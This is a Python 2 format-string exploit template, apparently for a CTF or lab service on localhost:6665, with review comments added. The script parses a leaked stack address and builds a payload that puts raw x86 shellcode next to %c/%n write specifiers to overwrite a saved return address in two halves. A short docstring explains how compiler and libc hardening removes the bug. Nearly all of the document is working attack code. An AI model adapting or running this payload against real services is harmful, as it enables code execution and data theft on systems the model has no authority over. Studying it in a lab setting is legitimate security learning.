fsb 익스플로잇 기본틀
#/usr/bin/python
# NOTE(review): the shebang above is missing its '!' ("#!/usr/bin/python"), so the
# file only runs via "python <file>"; the print statements make it Python 2 only.
"""Format-string-bug (FSB) exploit template, as posted.

Flow visible in this script: connect to localhost:6665, read a banner of the
form "Attack 0x<hex>...", parse the leaked address out of it, build a single
request consisting of two packed 4-byte target addresses, the shellcode bytes,
two "%08x" specifiers and two "%<count>c%n" pairs, send it, and print the reply.

Defensive note: the write primitive this depends on exists only because the
target hands attacker-controlled data to a printf-family function as the
format argument. Building the target with -Wformat-security and
_FORTIFY_SOURCE (glibc's fortified printf aborts on %n when the format string
sits in writable memory), or passing the data as an argument to a literal
format, removes it.
"""
from socket import *
from struct import *
# Shellcode and NOP-sled setup
nopsled = "\x90"
sc = ""
#sc += nopsled*0x10
# Raw x86 machine code, sent verbatim. It is not decoded here, so nothing about
# what it does is asserted in this listing.
sc += "\x55\x89\xe5\x83\xec\x20\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x05\x6a\x79\x66\x68\x6b\x65\x89\xe3\xcd\x80\x89\xc3\xb0\x03\x8d\x4d\xe0\xb2\x21\xcd\x80\x89\xc2\xb0\x04\xb3\x04\xcd\x80\xc9\xc3"
s = socket(AF_INET, SOCK_STREAM)
s.connect(("localhost", 6665))
rv = s.recv(1024)  # NOTE(review): assumes one recv() returns the whole banner
print rv
# Leaked-address frame
## string -> int
# Assumes the banner is exactly "Attack 0x<hex>" followed by three trailing
# characters that the -3 slice drops — TODO confirm against the target's output.
addrStr = rv[len("Attack 0x"):-3]
addrHex = int(addrStr, 16)
print "addrHex : %X"%addrHex
# Address where the shellcode will sit: start from the buffer address and
# correct it further down. Each 4-hex-character slice is a 16-bit half.
# NOTE(review): the [-5:-1] slice only yields the last four hex digits when
# hex() appends a trailing 'L' (Python 2 long); whether it does depends on the
# interpreter's int width — verify.
lowBufAddr = int(hex(addrHex)[len("0x"):len("0x")+4],16)
highBufAddr = int(hex(addrHex)[-5:-1],16)
# Offset of the buffer relative to ebp
buftoebp = 0x198
# Build the payload
payload = ""
payload += pack('<I', addrHex+buftoebp+4) # RET (low half)
payload += "AAAA"
payload += pack('<I', addrHex+buftoebp+4+2) # RET + 2 (high half)
payload += "AAAA"
# Shellcode address = buffer address + length of the payload built so far
highBufAddr += len(payload)
print "lowBufAddr = %x"%lowBufAddr
print "highBufAddr = %x"%highBufAddr
payload += sc
# Number of "%08x" specifiers to emit
cPercentX = 2
payload += "%08x"*cPercentX
# Characters emitted before the first %n: four 4-byte words, the shellcode,
# and 8 characters per "%08x"
length = 4*4 + len(sc) + 8*cPercentX
count1 = highBufAddr - length
count2 = 0x10000+lowBufAddr - highBufAddr # keep the count positive when the difference would be negative
print "c1 : %d, c2 : %d"%(count1, count2)
payload += "%%%dc%%n"%count1
payload += "%%%dc%%n"%count2
print "length : %d"%len(payload)
print "payload : :%s"%payload
s.send(payload)
rv = s.recv(1024)
print rv
s.close()